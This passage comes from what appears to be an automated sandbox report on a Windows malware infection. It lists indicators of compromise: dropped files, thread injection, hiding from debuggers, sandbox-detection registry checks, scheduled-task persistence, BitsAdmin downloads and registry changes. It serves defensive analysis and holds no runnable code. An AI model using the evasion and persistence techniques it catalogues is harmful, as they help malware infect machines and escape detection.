B2893002D62B278E svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{D150A421-63CD-46E4-ADDB-794A26A5C800} svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
pid Process 1556 3482271.exe 1488 7933448.exe 5284 5338000.exe 6064 4151522.exe 6184 CXGvGSzadJsTx1qTxImyPp7A.exe 6684 EfYzouvnW3iAXodDye6sK70I.exe 6796 Calculator.exe 6604 8QS5QO54Pu7CmqPq1QMNVpdP.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 5468 lierne.exe 6592 u3cRqTdVGtXPgh8ADvnvPDLI.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 3136 set thread context of 2080 3136 Mon1727c156c4abcec.exe 115 PID 4360 set thread context of 1480 4360 Mon174a6c5f1664f.exe 116 PID 4392 set thread context of 5884 4392 Mon1708beae021a5ff.exe 173 PID 5060 set thread context of 6952 5060 svchost.exe 242 PID 1372 set thread context of 2604 1372 i9iBfSFpiJLNYdkx4pTJj13W.exe 31 PID 6492 set thread context of 2604 6492 MiFnSOOP3jL2bVNTqswI6fwY.exe 31 PID 6856 set thread context of 1548 6856 G_qlYSMI3UpBnqt1rgDYiWfA.exe 250 PID 6948 set thread context of 5048 6948 oB2x5G23PqGLN_dcI6m33Hqc.exe 256 PID 5912 set thread context of 7272 5912 13DXiLTMa1hLpSFPz4hnS78R.exe 263 PID 6548 set thread context of 7396 6548 k0TXFOp3H5JxB39Nd0AgP7Fb.exe 265 PID 5528 set thread context of 2604 5528 control.exe 31 PID 5468 set thread context of 2556 5468 lierne.exe 288 PID 6712 set thread context of 2252 6712 conhost.exe 490 PID 5528 set thread context of 2252 5528 control.exe 490 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\is-93LKS.tmp zhanglijuan-game.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm explorer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW explorer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe wkXv2fTh4gd_QhZD3v2cNXAC.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe -
Drops file in Windows directory 44 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIAF4B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI476.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1214.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIB392.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBAE8.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI19C8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB17E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C4B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1D36.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\f7c9cfd.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI247B.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\f7c9cfa.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA528.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB578.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFF62.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI109.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIB8F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB39.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\f7c9cfa.msi msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI36B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFD8C.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI1774.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI186F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1B30.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 3680 1376 WerFault.exe 109 1272 1376 WerFault.exe 109 4204 1376 WerFault.exe 109 3548 1376 WerFault.exe 109 5968 4252 WerFault.exe 151 1964 4392 WerFault.exe 100 1368 4252 WerFault.exe 151 5724 1376 WerFault.exe 109 5880 4252 WerFault.exe 151 5844 2648 WerFault.exe 156 5612 4252 WerFault.exe 151 5548 1376 WerFault.exe 109 5672 1376 WerFault.exe 109 5296 4252 WerFault.exe 151 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI mbqtmEoq2yLOhYkBnJknXxjC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pPg9gR09BXK6mbu2BNNejH5P.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pPg9gR09BXK6mbu2BNNejH5P.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pPg9gR09BXK6mbu2BNNejH5P.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Uu8ktdPLBFcY1iPXMPwESBiH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI mbqtmEoq2yLOhYkBnJknXxjC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI mbqtmEoq2yLOhYkBnJknXxjC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Uu8ktdPLBFcY1iPXMPwESBiH.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Uu8ktdPLBFcY1iPXMPwESBiH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tvssfjc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7380 schtasks.exe 6732 schtasks.exe 1988 schtasks.exe 7224 schtasks.exe 8992 schtasks.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 1968 bitsadmin.exe 6020 bitsadmin.exe -
Kills process with taskkill 10 IoCs
pid Process 4936 taskkill.exe 6508 taskkill.exe 6136 taskkill.exe 6120 taskkill.exe 5952 taskkill.exe 6212 taskkill.exe 7064 taskkill.exe 4744 taskkill.exe 4040 taskkill.exe 2032 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 cmd.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" cmd.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 control.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU cmd.exe -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\VersionIndependentProgID\ = "NucleusNativeMessaging.NucleusNativeMessaging" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\PROXYSTUBCLSID32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TYPELIB OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ = "IFileSyncClient5" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\grvopen\UseOriginalUrlEncoding = "1" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{0776AE27-5AB9-4E18-9063-1836DA63117A}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{2E7C0A19-0438-41E9-81E3-3AD3D64F55BA}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\VERSIONINDEPENDENTPROGID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "48" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{ADCB6DEB-35A7-45C7-852F-279ED47CF664}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\ProxyStubClsid32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\HELPDIR OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dtscout.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LOCALSERVER32 OneDriveSetup.exe Key deleted 